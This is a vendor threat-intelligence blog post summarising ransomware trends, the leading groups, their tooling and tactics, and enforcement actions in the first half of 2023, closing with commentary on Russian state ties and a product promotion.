Power Rankings: Ransomware Malicious Quartile First-Half 2023

More than 2,300 organizations succumbed to ransomware attacks in just the first half of 2023, with the vast majority carried out by only three ransomware operators: LockBit (35.3%), BlackCat//ALPHV (14.2%), and Cl0p (11.9%).  

Overall, ransomware attacks were up 74% in Q2-2023 over Q1. Ransomware attacks continue to be extremely lucrative, with ransom demands and recovery costs bleeding victim organizations for millions of dollars.  

RaaS operators and other data extortion attackers are developing custom tooling and implementing novel evasion techniques into their payloads designed to evade or completely circumvent traditional endpoint protection solutions.

Ransomware operators are expanding their addressable target range with additional Linux variants emerging, as well as one of the first viable variants targeting macOS.

Furthermore, ransomware attacks are creating liability issues and intellectual property loss for organizations as attackers focus on the exfiltration of sensitive data prior to delivering the ransomware payload.

Key Highlights for First-Half 2023

The Halcyon team of ransomware experts publish a quarterly RaaS and extortion group power ranking guide as a quick reference. The Q2-2023 report is available here: Power Rankings: Ransomware Malicious Quartile Q2 2023 (PDF). ‍

General Trends

Some interesting trends emerged in the first half of 2023, evidence that ransomware operators are investing heavily in development and are improving operational efficiencies through automation:

• The precipitous decline in attacks observed in 2022 was short lived with attack volume records smashed in March 2023
• Attackers are expanding their addressable targets with more groups developing Linux variants
• Some ransomware groups are shifting tactics to straight data exfiltration extortion attacks with no encryption payload
• 8Base ransomware gang ramps up with a whopping 67 attacks as of May 2023
• Dish Network is just one of the victim organizations facing class action lawsuits stemming from ransomware attacks that exposed sensitive data

Tooling

Operators continue to invest in new tooling:

• Attackers introduced custom tooling like AuKill & Backstab to bypass security solutions
• Ransomware operators developed custom Grixba & VSS Copying tools for data exfiltration
• Attackers observed using Living-off-the-Land (LotL) techniques by way of a custom PowerShell-based tool to automate data exfiltration on targeted networks
• What may be the first variant observed targeting MacOS was released detected in the wild
• Semi-autonomous ransomware strain dubbed Rorschach emerges with advanced automation, fast encryption speed and stealthy DLL side-loading for security evasion and persistence
• BlackCat/ALPHV released variant dubbed Sphynx that dramatically increases both encryption speed and stealth in bypassing security solutions

Tactics

Attackers continue to innovate their tactics:

• Attackers are increasingly automating exploits of known vulnerabilities like MOVEit; PAN Cortex XDR; GoAnywhere; IBM Aspera Faspex; VMWare ESXi; PaperCut; MS SQL  
• Ransomware gangs are increasingly exposing sensitive data such as the leaking compromising clinical photographs of breast cancer patients
• The Cl0p gang claimed more than 100 victims in a massive attack spree by exploiting a vulnerability in in GoAnywhere software – a precursor to an even bigger campaign that leveraged a vulnerability in MOVEit software to compromise hundreds more victims
• Ransomware operators are increasingly using advanced techniques like DLL Side-Loading which are more typical of APT-type operations
• A new double extortion tactic was observed where attackers instruct victims to provide details of their cyber insurance coverage to set the ransom demand
• Nokoyawa dropped Windows CLFS zero-day - it is highly unusual to see ransomware operators leveraging zero-days, a tactic more common to APT operations
• Ransomware attacks abused Microsoft SharePoint without first compromising an endpoint via compromised Global SaaS admin account
• Novel Cactus ransomware exploits common vulnerabilities found in VPNs to gain persistence on the network

Enforcement Actions

The first half of 2023 brought some scattered enforcement actions, arrests and indictments of affiliates and other low-level threat actors in the ransomware arena, including:

• The takedown of the notorious Hive ransomware operation
• Indictment of Mikhail Pavlovich Matveev for participation in LockBit, Babuk, and Hive attacks;  
• Arrest of Ruslan Magomedovich Astamirov, in Arizona for participating in LockBit attacks
• Arrest of two individuals in Germany and Ukraine believed to be core members of the DoppelPaymer, with warrants issued for three more members
• Three Dutch nationals alleged to have extorted hundreds of thousands of euros from thousands of companies

The Takeaway

Ransomware attacks continue to be extremely lucrative, with ransom demands and recovery costs bleeding victim organizations for millions of dollars. Overall, law enforcement has had very little impact though in regard to disrupting ransomware operations.  

The one thing that the most notorious ransomware gangs have in common are their ties to Russia, with the majority closely aligned – if not directly controlled – by the Russian government and its intelligence apparatus.

The increasing overlap of cybercriminal activity with nation-state-supported operations conveniently allows for plausible deniability for Russia, allowing them to distance themselves while still being instrumental in attacks.

Using ransomware gangs as a proxy to conduct attacks and thwart attribution is the strategy here. This is one of the key reasons cyber operations have become such an important aspect of larger geopolitical issues – because attribution is hard.

The US and allied governments are in a tough position regarding what actions to take to stem this wave of ransomware attacks, namely because there is so much ambiguity in determining root attribution for the attacks.  

Even when ransomware operators are arrested, there is someone to take their place quickly. Ultimately, it's the Russian government that is both providing safe harbor for most of the criminal elements conducting ransomware attacks.

Until the US government directly sanctions Russia for their direct and/or tacit support of ransomware and data extortion operations, we will not see attacks subside any time soon.  

It's only a matter of time before we see another massively disruptive attack against a critical infrastructure target, and by then it will be too late to act. ‍

‍

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.